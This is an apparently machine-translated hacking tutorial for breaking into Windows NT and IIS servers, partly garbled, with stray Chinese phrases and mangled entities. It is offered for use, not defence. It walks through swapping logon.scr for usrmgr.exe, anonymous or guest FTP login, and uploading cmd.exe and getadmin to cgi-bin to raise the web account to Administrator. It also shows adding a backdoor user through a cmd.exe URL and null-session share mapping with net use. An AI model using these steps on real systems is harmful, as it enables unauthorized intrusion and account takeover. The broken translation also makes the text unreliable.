If you have an ordinary user account,there is a very simple method to get the NT Administrator account:
One of: first c:\winnt\system32 under logon. the scr was renamed as logon. old backup Then put the usrmgr. exe renamed to logon. scr
the logon. the scr is loaded at startup of the program after the reboot, do not appear past the login password input interface, but the User Manager.
In this case he has permission to put yourself added to the Administrator group
Don't forget to put the file name changed back!
Bis: The following technology is applicable to not paying attention to the NT network security of the site, some http techniques also can be used for higher-level personnel reference
Into the NT network can take the following steps:
Because the NT IIS server in the ftp are generally allowed anonymous anonymous account into some anonymous account and upload permissions, we need to attack this site. Because if you do not allow the anonymous account, it could result in plaintext passwords in the online transmission. With tcpspy tools can intercept these passwords. Now do not talk about these more advanced techniques. Because of the allow anonymous account for the ftp login settings, also bring us a breakthrough in the NT server opportunities. We use the ftp login to a NT server,比如 :www.xxx.com(an example name):
Connected to www.xxx.com
ntsvr2 this thing exposed its NETbios name,then in the IIS in the background, there must be a IUSER_ntsvr2 the user account belongs to Domain user Group, this account we later used to obtain Administrator privileges. User (www.xxx.comnone)):anonymous
Password: enter guest@ or guest
For lack of network security knowledge of the administrator,many people don't have the guest account prohibition, or not to set a password. Then the guest account is the one with the correct user account, although only belongs to the Domain guest group.
In this case we can into the NT server the ftp.
Go in later,look at the directory listing,try cd /c or wwwroot, and other key directory,if lucky,change the directory successfully, then you have 8 0% of the grasp.
Now,start to find the cgi-bin directory(or scripts directory),go in later,
Put the winnt under cmd. execopy to the cgi-bin,the getadmin and gasys. dll pass up to cgi-bin
Then input:http://www. xxx. com/cgi-bin/getadmin. exe? IUSR_SATURN
About ten more seconds after the screen display:
In this case a 9 0% could be: you have put IUSER_ntsvr2 upgrade to the Administrator, that is, any access to the web site of the person is the administrator.
Here you can add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add
This will create a china user,password is news,then:
You then use the china account login, you may have the greatest privileges, 也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe that can also pass a go up to the scripts/tools or cgi-bin directory.
Ter: With NT's Netbios technology to scan
So you can get the domain of the shared resource name
net view file://www. xxx. com/
You can get the machine of the shared resource name,if there is a c drive
net use f: file://www. xxx. com/c
You can use f:map its c drive
net use $">\\126.96.36.199\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;
Four: Unix ported tools: Windows95"amp;9 8 The user can use the tcp/ip tool to get tcp/ip connection in the package:
WinDump95.exe before using also to download this library Packet95.exe
WindowsNT user version